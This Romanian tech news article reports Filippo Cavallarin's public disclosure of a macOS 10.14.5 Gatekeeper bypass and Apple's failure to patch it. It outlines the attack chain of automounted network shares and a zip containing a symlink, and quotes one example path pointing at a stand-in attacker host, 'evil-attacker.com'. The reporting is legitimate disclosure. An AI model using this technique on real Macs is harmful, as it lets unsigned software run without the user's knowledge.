Închide anunțul

Cercetătorul de securitate Filippo Cavallarin a postat un avertisment despre eroarea din macOS 10.14.5 pe blogul său. Aceasta constă în posibilitatea de a ocoli complet măsurile de securitate ale Gatekeeper. Potrivit lui Cavallarin, el a subliniat eroarea lui Apple deja în februarie a acestui an, dar compania nu a remediat-o în cea mai recentă actualizare.

Gatekeeper a fost dezvoltat de Apple și încorporat în sistemul său de operare desktop pentru prima dată în 2012. Este un mecanism care împiedică rularea unei aplicații fără știrea și acordul utilizatorului. După ce descărcați o aplicație, Gatekeeper își verifică automat codul pentru a vedea dacă software-ul este semnat corect de Apple.

În postarea sa pe blog, Cavallarin observă că Gatekeeper, în mod implicit, consideră că atât stocarea externă, cât și partajarea rețelei sunt locații sigure. Prin urmare, orice aplicație care se află în aceste ținte poate fi lansată automat fără a fi nevoie să treacă prin verificarea Gatekeeper. Această caracteristică poate fi exploatată pentru a lansa software rău intenționat fără știrea utilizatorului.

Un aspect care permite accesul neautorizat este caracteristica de montare automată, care permite utilizatorilor să monteze automat o partajare de rețea, pur și simplu specificând o cale care începe cu „/net/”. De exemplu, Cavallarin citează calea „ls /net/evil-attacker.com/sharedfolder/” care poate determina sistemul de operare să încarce conținutul unui folder „sharefolder” într-o locație la distanță care poate fi potențial rău intenționată.

Puteți urmări modul în care funcționează amenințarea în videoclip:

Un alt factor este faptul că, dacă o arhivă zip care conține o legătură simbolică specifică care duce la funcția de montare automată este partajată, aceasta nu va fi verificată de Gatekeeper. În acest fel, victima poate descărca cu ușurință arhiva rău intenționată și o poate dezarhiva, permițând atacatorului să ruleze practic orice software pe Mac fără știrea utilizatorului. Finder, care ascunde anumite extensii în mod implicit, are și partea sa din această vulnerabilitate.

Cavallarin afirmă pe blogul său că Apple a atras atenția asupra vulnerabilității sistemului de operare macOS pe 22 februarie a acestui an. Dar la mijlocul lunii mai, Apple a încetat să mai comunice cu Cavallarin, așa că Cavallarin a decis să facă public totul.

mac-finder-kit

sursa: FCVL

.